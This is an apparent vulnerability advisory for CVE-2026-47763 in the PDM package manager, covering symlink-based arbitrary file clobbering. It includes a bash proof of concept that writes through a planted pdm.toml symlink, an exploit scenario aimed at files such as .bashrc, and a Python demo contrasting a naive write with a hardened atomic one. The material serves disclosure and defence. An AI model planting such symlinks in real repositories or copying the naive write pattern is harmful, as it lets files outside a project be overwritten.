This vulnerability, identified as CVE-2026-47763, affects the Python package manager PDM. It allows an attacker to perform arbitrary file clobbering (overwriting) by exploiting how PDM handles project-local configuration files. When a user initializes a PDM project in a repository that has been maliciously prepared, any configuration command that writes to a file can be manipulated.
The core issue is that PDM writes several project-local state or configuration files, such as pdm.toml, .pdm-python, and .python-version, without any symlink protection. If an attacker places a symlink with the same name as one of these files in the repository, PDM will write to the target of that symlink instead of the intended file within the project directory. This creates an “arbitrary file clobber” primitive, meaning the user, with their own privileges, can inadvertently overwrite any file on the system that the symlink points to. The risk is particularly high when `pdm` is run with elevated privileges (like with sudo), as this could lead to overwriting critical system files and potential privilege escalation.
For the most stable sink, `pdm.toml`, the target file must already contain valid TOML data for the write operation to succeed. This constraint does not apply to the other vulnerable files, `.pdm-python` and `.python-version`. The vulnerability requires user interaction: the victim must actively run a command that writes project-local configuration or state, such as `pdm config --local ...`. This issue was fixed in PDM version 2.27.0, which introduced checks that refuse to write to symlinks.
DailyCVE Form:
Platform: pdm package manager
Version: 2.26.9 affected
Vulnerability: Symlink arbitrary write
Severity: 6.8 (Medium)
Date: 2026-05-21
Prediction: Already patched 2.27.0
What Undercode Say:
This PoC demonstrates the vulnerability by creating a symlink named `pdm.toml` pointing to a target file outside the project root. When `pdm config --local` is run, it writes to the target file instead of the symlink itself. Ensure you have a vulnerable version of pdm installed (e.g., 2.26.9).

```bash
# Create a new directory for the PoC and navigate into it.
mkdir -p ~/poc-symlink && cd ~/poc-symlink

# Create a target file that will be clobbered. For the main sink `pdm.toml`,
# the target must already contain valid TOML data; it can live anywhere on the system.
target="/tmp/clobbered-target.toml"
cat > "$target" <<'EOF'
value = 1
EOF

# Create a symlink named `pdm.toml` in the project directory pointing to the target file.
ln -s "$target" pdm.toml

# Create a minimal `pyproject.toml` to initialize the PDM project.
cat > pyproject.toml <<'EOF'
[project]
name = "symlink-clobber-demo"
version = "0.0.1"
EOF

# Run a PDM command that writes to the project-local config.
# This command modifies the `venv.in_project` setting (-l is short for --local).
pdm config -l venv.in_project false

# Now check the target file: it has been modified with the new config.
echo " target file contents "
cat "$target"
echo " end "
```

This shows that the config was written to the target of the symlink, not to a local `pdm.toml`.
Exploit:
The exploit requires the victim to clone a malicious repository and run a PDM command that writes to a project-local configuration file. The attacker prepares the repository by creating a symlink (e.g., `pdm.toml`) that points to a target file of the attacker's choosing, such as a system-level configuration file or the user's `.bashrc`. When the victim runs a command like `pdm config --local venv.in_project false`, PDM follows the symlink and clobbers the target file, potentially causing data loss, denial of service, or privilege escalation if the target is a sensitive file.
Protection:
Upgrade: Immediately upgrade to PDM version `2.27.0` or later, which includes a fix that refuses to write to project-local files if they are symlinks.
Symlink checks: Implement checks in code to validate that important configuration files are not symlinks before writing to them.
Secure configuration: Avoid writing to configuration files without using safe, atomic file operations that prevent symlink following.
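The symlink check and atomic write that the Protection items describe, shown beside the naive pattern that produces the clobber, as an added Python example. This is not PDM's code and does not reproduce PDM's actual fix; it assumes POSIX semantics for `os.lstat`, `os.replace` and symlink creation, and it builds its own scratch directory (a constructed scenario) so that nothing outside a temporary folder is touched.

```python
import os
import stat
import tempfile
from pathlib import Path


class SymlinkRefused(OSError):
    """Raised when a project-local config path turns out to be a symlink."""


def naive_write(path, data: str) -> None:
    """Vulnerable pattern: open() follows symlinks, so a planted link redirects
    the write to whatever it points at (the clobber primitive in the advisory)."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(data)


def safe_write(path, data: str) -> None:
    """Hardened pattern: refuse symlinks, then write atomically via rename."""
    path = Path(path)
    try:
        st = os.lstat(path)  # lstat() describes the link itself, not its target
    except FileNotFoundError:
        st = None
    if st is not None and stat.S_ISLNK(st.st_mode):
        raise SymlinkRefused(f"refusing to write through symlink: {path}")
    if st is not None and not stat.S_ISREG(st.st_mode):
        raise OSError(f"refusing to overwrite non-regular file: {path}")
    # Stage the content in a temp file in the same directory, then rename it over
    # the destination. os.replace() never follows a symlink at the destination, so a
    # link planted between lstat() and replace() is itself replaced, never written through.
    fd, tmp = tempfile.mkstemp(dir=path.parent, prefix=f".{path.name}.")
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as fh:
            fh.write(data)
            fh.flush()
            os.fsync(fh.fileno())
        os.replace(tmp, path)
    except BaseException:
        try:
            os.unlink(tmp)
        except FileNotFoundError:
            pass
        raise


def demo(workdir=None) -> dict:
    """Plant the symlink in a scratch directory and compare both writers.
    Constructed scenario: every path lives under a temporary directory."""
    workdir = Path(workdir) if workdir else Path(tempfile.mkdtemp(prefix="pdm-clobber-"))
    target = workdir / "outside" / "clobbered-target.toml"  # stands in for a file outside the repo
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text("value = 1\n", encoding="utf-8")
    project = workdir / "project"
    project.mkdir(exist_ok=True)
    link = project / "pdm.toml"
    link.symlink_to(target)  # the planted link in the cloned repo

    naive_write(link, "value = 2\n")  # follows the link: target is clobbered
    naive_clobbered = target.read_text(encoding="utf-8") == "value = 2\n"
    target.write_text("value = 1\n", encoding="utf-8")  # reset for the second run

    refused = False
    try:
        safe_write(link, "value = 3\n")
    except SymlinkRefused:
        refused = True

    regular = project / ".pdm-python"  # a normal, non-link sink still works
    safe_write(regular, "/usr/bin/python3\n")
    return {
        "naive_clobbered": naive_clobbered,
        "safe_refused": refused,
        "target_untouched_by_safe": target.read_text(encoding="utf-8") == "value = 1\n",
        "link_still_symlink": link.is_symlink(),
        "regular_written": regular.read_text(encoding="utf-8") == "/usr/bin/python3\n",
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The `lstat` check is the policy decision (refuse a planted link outright, which is what the advisory says 2.27.0 does), while the temp-file-plus-`os.replace` step is the guarantee: even if a symlink appears after the check, rename replaces the link entry rather than following it, so the file it pointed at is never written.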
Impact:
Arbitrary file clobbering: An attacker can overwrite any file that the victim user has write permissions for, potentially breaking the system or application functionality.
Privilege escalation: If PDM is run with elevated privileges (e.g., sudo), an attacker could clobber critical system files, leading to a complete system compromise or denial of service.
Data integrity loss: The vulnerability allows destructive modification of files outside the repository root, impacting data integrity and potentially causing data loss.
Sources:
Reported By: github.com